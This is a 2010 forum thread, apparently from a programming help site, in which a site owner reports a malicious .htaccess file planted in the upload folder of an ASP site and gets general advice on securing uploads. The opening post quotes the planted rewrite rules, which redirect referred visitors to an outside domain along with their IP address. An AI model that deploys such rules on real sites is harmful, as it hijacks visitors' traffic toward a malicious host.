Write access on upload folder creates security vulnerability

How do I secure folder while still allowing uploads

Page 1 of 1

2 Replies - 2160 Views - Last Post: 28 December 2010 - 04:52 PM

#1 RedRocky   User is offline

  • New D.I.C Head

Reputation: 0
  • View blog
  • Posts: 13
  • Joined: 12-February 09

Write access on upload folder creates security vulnerability

Posted 27 December 2010 - 11:19 AM

I have an ASP web site, on a Windows server, that allows users to upload image files after logging into a control panel.

To do this, write access is enabled on the folder that the images are uploaded to. This has worked fine for a long time.

However I recently discovered that a malicious .htaccess file had been uploaded to this folder. The file was not uploaded using my form for uploading images.

This .htaccess was preventing the uploaded images from being viewed on the web site with the following code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule .
http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}


If I deleted the file, it would soon reappear.

How can I fix this problem, so that users can continue to upload images after logging into my control panel, but malicious files like this cannot be uploaded?

I understand that allowing write access on a folder means that this is a potential issue, but how do they actually upload the file? What type of program are they using? How do you do an HTTP upload without using a file on the server? To upload images normally, users have to use the ASP code I wrote which sits on the server.

Is This A Good Question/Topic? 0
  • +

Replies To: Write access on upload folder creates security vulnerability

#2 Martyr2   User is offline

  • Programming Theoretician
  • member icon

Reputation: 5466
  • View blog
  • Posts: 14,421
  • Joined: 18-April 07

Re: Write access on upload folder creates security vulnerability

Posted 27 December 2010 - 12:04 PM

It is all about WHO has write access. When you setup a website that does uploads, you typically give ASP or PHP or whatever server side language its own user account. This means that only the website itself can write to that folder, no one else. Then, you make sure that no form on your site other than your upload form can access that folder. Then on your upload form you write server-side code that properly validates the file types allowed to be uploadded. For instance if you check image extensions for .jpg, .gif, .png, .bmp and reject all else, then you can't upload .htaccess.

Also I typically like to make the upload directory a cryptic name too that is not easily recognizable and appears no where in code that a client could see. Then the last trick is to make this upload folder one directory up from your web root. ASP/PHP can still access it, but no user can actually navigate to the folder since it is not in the web root.

What I mean by web root is that if all users accessing your site start in /users/a/html then put your uploads folder in /users/a and they won't be able to navigate up out of /html to get to it.

Hope these tricks help secure your uploads. :)

This post has been edited by Martyr2: 27 December 2010 - 12:05 PM

Was This Post Helpful? 0
  • +
  • -

#3 RedRocky   User is offline

  • New D.I.C Head

Reputation: 0
  • View blog
  • Posts: 13
  • Joined: 12-February 09

Re: Write access on upload folder creates security vulnerability

Posted 28 December 2010 - 04:52 PM

Hi thanks for your reply. I just want to emphasise that the malicious .htaccess files are not being uploaded using my upload form. They are getting on to the server some other way.
Any further thoughts are most welcome.
Thanks.
Was This Post Helpful? 0
  • +
  • -

Page 1 of 1